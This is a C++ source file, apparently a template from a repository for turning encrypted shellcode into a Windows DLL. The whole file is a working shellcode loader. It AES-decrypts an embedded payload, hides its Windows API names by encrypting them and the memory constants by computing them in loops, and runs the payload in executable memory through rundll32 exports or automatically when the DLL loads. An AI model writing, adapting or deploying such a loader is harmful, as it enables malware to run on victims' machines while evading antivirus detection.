Files
restkhz-ShellcodeEncrypt2DLL/template.cpp
T
2025-03-14 19:16:49 +01:00

259 lines
7.1 KiB
C++

#include <windows.h>
#include <stdio.h>
#include <wincrypt.h>
#include <stdlib.h>
#include "shellcode.h"
#pragma comment(lib, "crypt32.lib")
#pragma comment(lib, "user32.lib")
typedef LPVOID (WINAPI *pVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
typedef VOID (WINAPI *pRtlMoveMemory)(PVOID, const VOID*, SIZE_T);
typedef HANDLE (WINAPI *pCreateThread)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
typedef BOOL (WINAPI *pVirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);
pVirtualAlloc dynVirtualAlloc = NULL;
pRtlMoveMemory dynMoveMemory = NULL;
pCreateThread dynCreateThread = NULL;
pVirtualProtect dynVirtualProtect = NULL;
#ifdef STANDALONE
#define USE_HEADER_KEY
#endif
void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
// extract IV
BYTE iv[16];
char *originalShellcode = shellcode;
shellcode += OFFSET_HEAD;
memcpy(iv, shellcode, 16);
char *cipherText = shellcode + 16;
DWORD cipherTextLen = shellcodeLen - 16 - OFFSET_HEAD - OFFSET_TAIL;
if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
return;
}
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
CryptReleaseContext(hProv, 0);
return;
}
if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return;
}
if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return;
}
// IV
if (!CryptSetKeyParam(hKey, KP_IV, iv, 0)) {
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return;
}
// Decrypt
if (!CryptDecrypt(hKey, 0, TRUE, 0, (BYTE*)cipherText, &cipherTextLen)) {
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return;
}
memmove(originalShellcode, cipherText, cipherTextLen);
if(cipherTextLen < shellcodeLen)
originalShellcode[cipherTextLen] = '\0';
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
}
BOOL InitDynamicFunctions(char* key, DWORD keyLen) {
HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
unsigned char VA[] = {VIRTUALALLOC};
unsigned char RMM[] = {RTLMOVEMEMORY};
unsigned char CT[] = {CREATETHREAD};
unsigned char VP[] = {VIRTUALPROTECT};
DecryptAES((char*)VA, sizeof(VA), key, keyLen);
DecryptAES((char*)RMM, sizeof(RMM), key, keyLen);
DecryptAES((char*)CT, sizeof(CT), key, keyLen);
DecryptAES((char*)VP, sizeof(VP), key, keyLen);
/*
MessageBoxA(NULL, (char*)VA, "Decrypted VA", MB_OK);
MessageBoxA(NULL, (char*)RMM, "Decrypted RMM", MB_OK);
MessageBoxA(NULL, (char*)CT, "Decrypted CT", MB_OK);
MessageBoxA(NULL, (char*)VP, "Decrypted VP", MB_OK);
*/
dynVirtualAlloc = (pVirtualAlloc)GetProcAddress(hKernel32, (char*)VA);
dynMoveMemory = (pRtlMoveMemory)GetProcAddress(hKernel32, (char*)RMM);
dynCreateThread = (pCreateThread)GetProcAddress(hKernel32, (char*)CT);
dynVirtualProtect = (pVirtualProtect)GetProcAddress(hKernel32, (char*)VP);
if (!dynVirtualAlloc || !dynMoveMemory || !dynCreateThread || !dynVirtualProtect) {
MessageBoxA(NULL, "Dyn init failed", "Error", MB_OK | MB_ICONERROR);
return FALSE;
}
return TRUE;
}
#ifdef USE_HEADER_KEY
void CALLBACK run(void) {
unsigned char key[] = { KEY };
DWORD keyLen = sizeof(key);
unsigned char payload[] = { PAYLOAD };
DWORD payloadLen = sizeof(payload);
if (!InitDynamicFunctions((char*)key, keyLen)) {
return;
}
int t=1;
int page_readwrite = 0;
int page_execute_read = 0;
int zero = 3;
int mem_commit_mem_reserve = 0;
for (int i=0; i<4; i++) page_readwrite +=t;
for (int i=0; i<0x20; i++) page_execute_read+=t;
for (int i=0; i<3; i++) zero -= t;
for (int i=0; i<0x3000; i++) mem_commit_mem_reserve+=t;
LPVOID allocMem = dynVirtualAlloc(NULL, payloadLen, mem_commit_mem_reserve, page_readwrite);
if (!allocMem) {
free(key);
return;
}
DecryptAES((char*)payload, payloadLen, (char*)key, keyLen);
dynMoveMemory(allocMem, payload, payloadLen);
DWORD oldProtect;
if (!dynVirtualProtect(allocMem, payloadLen, page_execute_read, &oldProtect)) {
free(key);
return;
}
HANDLE tHandle = dynCreateThread(zero, 0, (LPTHREAD_START_ROUTINE)allocMem, zero, zero, zero);
if (!tHandle) {
free(key);
return;
}
WaitForSingleObject(tHandle, INFINITE);
//((void(*)())allocMem)();
}
#else
void CALLBACK run(char* key, DWORD keyLen) {
unsigned char payload[] = { PAYLOAD };
DWORD payloadLen = sizeof(payload);
if (!InitDynamicFunctions((char*)key, keyLen)) {
free(key);
return;
}
int t=1;
int page_readwrite = 0;
int page_execute_read = 0;
int zero = 3;
int mem_commit_mem_reserve = 0;
for (int i=0; i<4; i++) page_readwrite +=t;
for (int i=0; i<0x20; i++) page_execute_read+=t;
for (int i=0; i<3; i++) zero -= t;
for (int i=0; i<0x3000; i++) mem_commit_mem_reserve+=t;
LPVOID allocMem = dynVirtualAlloc(NULL, payloadLen, mem_commit_mem_reserve, page_readwrite);
if (!allocMem) {
free(key);
return;
}
DecryptAES((char*)payload, payloadLen, (char*)key, keyLen);
dynMoveMemory(allocMem, payload, payloadLen);
DWORD oldProtect;
if (!dynVirtualProtect(allocMem, payloadLen, page_execute_read, &oldProtect)) {
free(key);
return;
}
HANDLE tHandle = dynCreateThread(zero, 0, (LPTHREAD_START_ROUTINE)allocMem, zero, zero, zero);
if (!tHandle) {
free(key);
return;
}
WaitForSingleObject(tHandle, INFINITE);
free(key);
}
#endif
// Entry for rundll32
extern "C" __declspec(dllexport)
void CALLBACK EPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
#ifdef USE_HEADER_KEY
// Mode1: standalone. KEY was coded into dll.
run();
#else
// Mode2: key was NOT coded into dll.
run(lpszCmdLine, lstrlenA(lpszCmdLine));
#endif
}
#ifdef USE_HEADER_KEY
DWORD WINAPI ThreadProc(LPVOID lpParam) {
run();
return 0;
}
#endif
extern "C" __declspec(dllexport)
void CALLBACK meow(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
#ifdef USE_HEADER_KEY
// Mode1: standalone. KEY was coded into dll.
run();
#else
// Mode2: key was NOT coded into dll.
run(lpszCmdLine, lstrlenA(lpszCmdLine));
#endif
}
#ifdef USE_HEADER_KEY
DWORD WINAPI ThreadProc(LPVOID lpParam) {
run();
return 0;
}
#endif
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
#ifdef USE_HEADER_KEY
CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
break;
#endif
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}